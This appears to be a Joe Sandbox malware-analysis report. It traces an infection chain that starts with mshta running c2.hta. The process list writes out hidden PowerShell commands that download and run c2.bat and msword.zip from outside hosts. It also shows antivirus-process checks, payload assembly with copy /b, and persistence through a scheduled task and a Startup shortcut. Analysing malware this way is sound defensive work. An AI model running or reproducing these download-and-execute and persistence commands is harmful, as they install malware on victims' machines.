                                                                                      2025-01-11 21:53:06 UTC16384INData Raw: f8 76 14 b3 04 a6 76 33 26 3d 09 48 06 25 6e ca e4 8e 13 3c 24 19 38 50 93 60 f1 74 43 43 7e 94 c6 27 d2 5b 37 25 f8 02 92 03 5d 93 de 13 0e ad 2e 53 06 e8 4b 44 90 a6 86 39 76 a1 3b 9a 07 f7 fd 3b f4 14 8b 29 b3 1f 28 d6 e8 1b 71 af 6b 9d 8a d4 94 45 19 ea 03 0f 86 13 09 05 32 24 ef f8 e0 39 45 79 80 9d eb 4a b0 1e 88 9d aa d6 cf f6 a3 d2 d0 e9 97 b0 ae 43 77 d1 70 58 a1 da 25 74 b1 8e 14 6b e7 d3 a3 89 16 d9 e1 82 1c 59 a0 16 14 fb c9 12 50 cb 02 23 11 dd 77 f9 75 1a 7f 2c 10 76 c4 d6 d5 ec 26 3a b4 4d 00 2d fd 3b 10 36 47 c5 b1 9f fd c6 d3 cd fb 64 f3 36 7e 4d f7 2a e9 e5 77 64 ad 39 50 ce 08 00 22 d1 f6 b3 85 45 20 c6 a6 68 f5 f6 12 3b d8 7f d6 8b 53 a2 d8 3b 82 51 8c 80 87 42 15 5e 0e 5f 4a 87 52 48 b1 8a 03 95 78 77 41 bf e8 8a b8 51 12 4a ef 8f 68
                                                                                      Data Ascii: vv3&=H%n<$8P`tCC~'[7%].SKD9v;;)(qkE2$9EyJCwpX%tkYP#wu,v&:M-;6Gd6~M*wd9P"E h;S;QB^_JRHxwAQJh
                                                                                      2025-01-11 21:53:06 UTC16384INData Raw: d9 42 5f 15 2f 8e f6 3d a9 36 5a 8a 51 11 41 f6 81 b2 98 e6 69 aa 77 3f b7 e6 78 96 1b 2c bb 79 ff cf a1 10 23 b8 18 ed eb 42 54 d5 45 de 7f b5 6c 6e eb 78 00 9a a5 17 d7 83 5d f4 33 1d 6c a0 36 7a 54 ef 3c 42 6b 95 58 7c 6d 1c d1 fd 8d 6d 41 8f ba b6 46 dd 97 90 7c d3 57 31 9d 8d 48 77 a1 31 51 31 d3 52 d8 15 39 44 ad 4e f2 3c 07 e6 03 8c 75 31 b2 01 be 33 85 ca 50 ab 84 61 ee 03 c3 dc 34 5b 5c 00 22 bc 09 79 e8 ce dd 8a 81 2e 88 33 11 59 9e f5 d6 62 5c d1 58 76 8b 6b cb 58 a1 47 bd 71 4f c7 2a 89 f3 f1 fe 0f 0a 67 72 f1 6b 1a b7 5e f9 4f 8c 84 c0 03 de 89 a4 d1 42 4d b8 f2 a8 26 22 eb 6f 76 3b ac c3 11 08 49 af e4 a4 0b 2b 8e b3 f1 1d 05 00 8b 56 ed 68 7e 0e dd 3a ea 60 ae d8 75 ff 3b f3 46 8a f7 02 e2 8f a9 c9 56 5f ac 8d 56 fc cc 1c d0 09 ca 70 ac c1
                                                                                      Data Ascii: B_/=6ZQAiw?x,y#BTElnx]3l6zT<BkX|mmAF|W1Hw1Q1R9DN<u13Pa4[\"y.3Yb\XvkXGqO*grk^OBM&"ov;I+Vh~:`u;FV_Vp



Target ID: 0
Start time: 16:52:56
Start date: 11/01/2025
Path: C:\Windows\SysWOW64\mshta.exe
Wow64 process (32bit): true
Commandline: mshta.exe "C:\Users\user\Desktop\c2.hta"
Imagebase: 0xb0000
File size: 13'312 bytes
MD5 hash: 06B02D5C097C7DB1F109749C45F3F505
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 2
Start time: 16:52:57
Start date: 11/01/2025
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $url='https://candwfarmsllc.com/c2.bat'; $output=$env:TEMP + '\c2.bat'; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -NoNewWindow"
Imagebase: 0x4f0000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 16:52:57
Start date: 11/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 16:52:58
Start date: 11/01/2025
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\c2.bat""
Imagebase: 0x240000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 16:52:59
Start date: 11/01/2025
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"
Imagebase: 0x4f0000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 16:53:01
Start date: 11/01/2025
Path: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\W2.pdf"
Imagebase: 0x7ff6bc1b0000
File size: 5'641'176 bytes
MD5 hash: 24EAD1C46A47022347DC0F05F6EFBB8C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 7
Start time: 16:53:01
Start date: 11/01/2025
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"
Imagebase: 0x4f0000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 8
Start time: 16:53:03
Start date: 11/01/2025
Path: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Imagebase: 0x7ff74bb60000
File size: 3'581'912 bytes
MD5 hash: 9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 9
Start time: 16:53:03
Start date: 11/01/2025
Path: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2072 --field-trial-handle=1344,i,14857468376700330533,7466528391267394821,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Imagebase: 0x7ff74bb60000
File size: 3'581'912 bytes
MD5 hash: 9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 13
Start time: 16:53:13
Start date: 11/01/2025
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"
Imagebase: 0x4f0000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 16
Start time: 16:53:33
Start date: 11/01/2025
Path: C:\Users\user\AppData\Local\Temp\msword\msword.exe
Wow64 process (32bit): true
Commandline: msword.exe
Imagebase: 0x400000
File size: 597'659'152 bytes
MD5 hash: 0DE162AA65BC5DAE2145333A0D1F8801
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 16%, ReversingLabs
Has exited: true

Target ID: 17
Start time: 16:53:35
Start date: 11/01/2025
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\cmd.exe" /c move Nr Nr.cmd & Nr.cmd
Imagebase: 0x240000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 18
Start time: 16:53:35
Start date: 11/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 19
Start time: 16:53:36
Start date: 11/01/2025
Path: C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit): true
Commandline: tasklist
Imagebase: 0xb10000
File size: 79'360 bytes
MD5 hash: 0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 20
Start time: 16:53:36
Start date: 11/01/2025
Path: C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit): true
Commandline: findstr /I "opssvc wrsa"
Imagebase: 0xf10000
File size: 29'696 bytes
MD5 hash: F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 21
Start time: 16:53:37
Start date: 11/01/2025
Path: C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit): true
Commandline: tasklist
Imagebase: 0xb10000
File size: 79'360 bytes
MD5 hash: 0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 22
Start time: 16:53:37
Start date: 11/01/2025
Path: C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit): true
Commandline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Imagebase: 0xf10000
File size: 29'696 bytes
MD5 hash: F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 23
Start time: 16:53:38
Start date: 11/01/2025
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd /c md 361684
Imagebase: 0x240000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 24
Start time: 16:53:38
Start date: 11/01/2025
Path: C:\Windows\SysWOW64\extrac32.exe
Wow64 process (32bit): true
Commandline: extrac32 /Y /E Approaches
Imagebase: 0x80000
File size: 29'184 bytes
MD5 hash: 9472AAB6390E4F1431BAA912FCFF9707
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 25
Start time: 16:53:38
Start date: 11/01/2025
Path: C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit): true
Commandline: findstr /V "Korea" Measurement
Imagebase: 0xf10000
File size: 29'696 bytes
MD5 hash: F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 26
Start time: 16:53:38
Start date: 11/01/2025
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd /c copy /b 361684\Propose.com + Different + Constitute + Instantly + Led + Indonesia + Dressing + Missed + Brian + Clinton + Protocol 361684\Propose.com
Imagebase: 0x240000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 27
Start time: 16:53:38
Start date: 11/01/2025
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd /c copy /b ..\Next + ..\Math + ..\Blocked + ..\Leisure + ..\Substantial + ..\Beam + ..\Cocks + ..\David + ..\Undefined + ..\Realm U
Imagebase: 0x240000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 28
Start time: 16:53:38
Start date: 11/01/2025
Path: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:Propose.com U
                                                                                      Imagebase:0x3b0000
                                                                                      File size:947'288 bytes
                                                                                      MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Antivirus matches:
                                                                                      • Detection: 0%, ReversingLabs
                                                                                      Has exited:false

                                                                                      Target ID:29
                                                                                      Start time:16:53:38
                                                                                      Start date:11/01/2025
                                                                                      Path:C:\Windows\SysWOW64\choice.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:choice /d y /t 5
                                                                                      Imagebase:0xac0000
                                                                                      File size:28'160 bytes
                                                                                      MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:30
                                                                                      Start time:16:53:39
                                                                                      Start date:11/01/2025
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:cmd /c schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
                                                                                      Imagebase:0x240000
                                                                                      File size:236'544 bytes
                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:31
                                                                                      Start time:16:53:39
                                                                                      Start date:11/01/2025
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:32
                                                                                      Start time:16:53:39
                                                                                      Start date:11/01/2025
                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
                                                                                      Imagebase:0x640000
                                                                                      File size:187'904 bytes
                                                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:33
                                                                                      Start time:16:53:40
                                                                                      Start date:11/01/2025
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & echo URL="C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & exit
                                                                                      Imagebase:0x240000
                                                                                      File size:236'544 bytes
                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:34
                                                                                      Start time:16:53:40
                                                                                      Start date:11/01/2025
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:35
                                                                                      Start time:16:53:40
                                                                                      Start date:11/01/2025
                                                                                      Path:C:\Windows\System32\wscript.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js"
                                                                                      Imagebase:0x7ff625570000
                                                                                      File size:170'496 bytes
                                                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:36
                                                                                      Start time:16:53:41
                                                                                      Start date:11/01/2025
                                                                                      Path:C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"
                                                                                      Imagebase:0x200000
                                                                                      File size:947'288 bytes
                                                                                      MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Antivirus matches:
                                                                                      • Detection: 0%, ReversingLabs
                                                                                      Has exited:true

                                                                                      Target ID:37
                                                                                      Start time:16:53:50
                                                                                      Start date:11/01/2025
                                                                                      Path:C:\Windows\System32\wscript.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js"
                                                                                      Imagebase:0x7ff625570000
                                                                                      File size:170'496 bytes
                                                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:38
                                                                                      Start time:16:53:51
                                                                                      Start date:11/01/2025
                                                                                      Path:C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"
                                                                                      Imagebase:0xed0000
                                                                                      File size:947'288 bytes
                                                                                      MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true


                                                                                        Execution Graph

                                                                                        Execution Coverage:2.6%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:12%
                                                                                        Total number of Nodes:25
                                                                                        Total number of Limit Nodes:0

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.1693044344.0000000004810000.00000040.00000800.00020000.00000000.sdmp, Offset: 04810000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_4810000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4Ldq$4Ldq$4Ldq
                                                                                        • API String ID: 0-2966122151
                                                                                        • Opcode ID: 726b49d80d61badc2f4ebc5cb11c45b34c58c086bad7e6d883b94d5a14243362
                                                                                        • Instruction ID: 27e6eb897c56462e87470427575a0a32a03b12371266fcd215bd94402ecb81f8
                                                                                        • Opcode Fuzzy Hash: 726b49d80d61badc2f4ebc5cb11c45b34c58c086bad7e6d883b94d5a14243362
                                                                                        • Instruction Fuzzy Hash: A812C070A003188FDB14DFA4C895BADBBF6BF88304F1489A9D50A9B3A1DB75AC44CF51

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        APIs
                                                                                        • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,?,?,?,00000000,00000000,00000004), ref: 048197B5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.1693044344.0000000004810000.00000040.00000800.00020000.00000000.sdmp, Offset: 04810000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_4810000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateProcess
                                                                                        • String ID:
                                                                                        • API String ID: 963392458-0
                                                                                        • Opcode ID: 0eb82a34e46f9cb8d730be92d48ecb2e533557ae95017adeb4c0ea9581821b2e
                                                                                        • Instruction ID: d98f26aea81b5a3ea5ff8e7c7f7f5faaa29994324a3a8cf38d7bb4d0d3531d6e
                                                                                        • Opcode Fuzzy Hash: 0eb82a34e46f9cb8d730be92d48ecb2e533557ae95017adeb4c0ea9581821b2e
                                                                                        • Instruction Fuzzy Hash: 16C126B1D00219DFDB24CFA9C894BDDBBB5BF48304F25862AE405B7260DB74A985CF91

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.1693044344.0000000004810000.00000040.00000800.00020000.00000000.sdmp, Offset: 04810000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_4810000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0a23e92a9ba4a3d9acdde3fcf3b58c5b32d1d7f9eb56ab3b62dd15e5dca2e224
                                                                                        • Instruction ID: c5aa68ab9143e16751513a56c30af92ccb0b479d68dd8cc9864cc75394cb05a7
                                                                                        • Opcode Fuzzy Hash: 0a23e92a9ba4a3d9acdde3fcf3b58c5b32d1d7f9eb56ab3b62dd15e5dca2e224
                                                                                        • Instruction Fuzzy Hash: 63C127B1D00219DFDB24CFA9C894BDDBBB5BF48304F25862AE405B7260DB74A985CF91

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        [Control-flow graph 689 rendered as edge data in the original; omitted here. Basic blocks span 4817e98-481997a; the function calls ResumeThread.]
                                                                                        APIs
                                                                                        • ResumeThread.KERNELBASE(00000004), ref: 04819947
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.1693044344.0000000004810000.00000040.00000800.00020000.00000000.sdmp, Offset: 04810000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_4810000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID:
                                                                                        • API String ID: 947044025-0
                                                                                        • Opcode ID: 5893398d66f13f59a22ce59acc852dc2d651898ccc5b57814812128f314a6f70
                                                                                        • Instruction ID: 31578664295fb1a0d79738b312e00aa073515bf1f630eda7ce0e16c71c8178b4
                                                                                        • Opcode Fuzzy Hash: 5893398d66f13f59a22ce59acc852dc2d651898ccc5b57814812128f314a6f70
                                                                                        • Instruction Fuzzy Hash: 6D1125B19003488FCB10DF9EC548B9EFBF8EB49324F24845AD619A7350C774A944CFA5

                                                                                        Control-flow Graph

                                                                                        [Control-flow graph 696 rendered as edge data in the original; omitted here. Basic blocks span 48198e2-481997a; the function calls ResumeThread.]
                                                                                        APIs
                                                                                        • ResumeThread.KERNELBASE(00000004), ref: 04819947
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.1693044344.0000000004810000.00000040.00000800.00020000.00000000.sdmp, Offset: 04810000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_4810000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID:
                                                                                        • API String ID: 947044025-0
                                                                                        • Opcode ID: f3e3f9c8a98d200ff794746fb4f18d57bceaa8e3e390af918c8ff5c4d288d776
                                                                                        • Instruction ID: 615f10997ce45e3deb9e2dff5fc2d24c6e562a06eb259660a8a7b34008c59c63
                                                                                        • Opcode Fuzzy Hash: f3e3f9c8a98d200ff794746fb4f18d57bceaa8e3e390af918c8ff5c4d288d776
                                                                                        • Instruction Fuzzy Hash: 1C1133B58002488FCB20DF9AD544BDEFFF8EB89320F24841AD659A3350C778A944CFA5

                                                                                        Control-flow Graph

                                                                                        [Control-flow graph 879 rendered as edge data in the original; omitted here. Basic blocks span 2fed01d-2fed095; no API calls are referenced.]
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.1692802741.0000000002FED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FED000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_2fed000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8588061dc6a0cf269851bb84b066039b4c39aeb412c40e254392f63a80d76daa
                                                                                        • Instruction ID: cc4e930f4dfe1831ad584c483ec7ea8d092d2ac8a6649d59b286ae431c688f41
                                                                                        • Opcode Fuzzy Hash: 8588061dc6a0cf269851bb84b066039b4c39aeb412c40e254392f63a80d76daa
                                                                                        • Instruction Fuzzy Hash: C40147725043049AEB114A19CC84B26BFDCDF517A4F0CC419EF0A0BA4AC3389841C7B1

                                                                                        Control-flow Graph

                                                                                        [Control-flow graph 866 rendered as edge data in the original; omitted here. Basic blocks span 2fed005-2fed095; no API calls are referenced.]
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.1692802741.0000000002FED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FED000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_2fed000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ca1750921cab65e433c005ca40e816c189a7978d3678f81e0314b79a28c6a908
                                                                                        • Instruction ID: 57466012ce94d9920d97f87de95bde8bd0cb26f48f1aa50d16625f329c0fddb2
                                                                                        • Opcode Fuzzy Hash: ca1750921cab65e433c005ca40e816c189a7978d3678f81e0314b79a28c6a908
                                                                                        • Instruction Fuzzy Hash: 6501806140E3C05ED7138B258894B52BFB8DF53624F0DC0DBD9888F1A7C2695849C772

                                                                                        Execution Graph

                                                                                        Execution Coverage:18.8%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:16.1%
                                                                                        Total number of Nodes:1525
                                                                                        Total number of Limit Nodes:33
                                                                                        [Execution graph rendered as node/edge data in the original; omitted here. Node labels in the omitted data reference the following Windows APIs:
                                                                                        file and handle: CreateFileW, ReadFile, WriteFile, CloseHandle, SetFilePointer, GetFileSize, GetFileAttributesW, DeleteFileW, CopyFileW, FindNextFileW, FindClose, CreateDirectoryW, SetCurrentDirectoryW, GetTempPathW, GetWindowsDirectoryW, GetModuleFileNameW, SHGetPathFromIDListW, SHGetFileInfoW, SHFileOperationW;
                                                                                        process and module: CreateProcessW, CreateThread, OpenProcess, GetCurrentProcess, ExitWindowsEx, LoadLibraryA, LoadLibraryExW, FreeLibrary, GetProcAddress, GetModuleHandleA, GetModuleHandleW, GetCommandLineW, GetTickCount, GetVersionExW, SetErrorMode, OleInitialize, CoCreateInstance, KiUserCallbackDispatcher, and one import by ordinal (#17);
                                                                                        registry: RegOpenKeyExW, RegCreateKeyExW, RegQueryValueExW, RegSetValueExW, RegEnumKeyW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey;
                                                                                        version info: GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW;
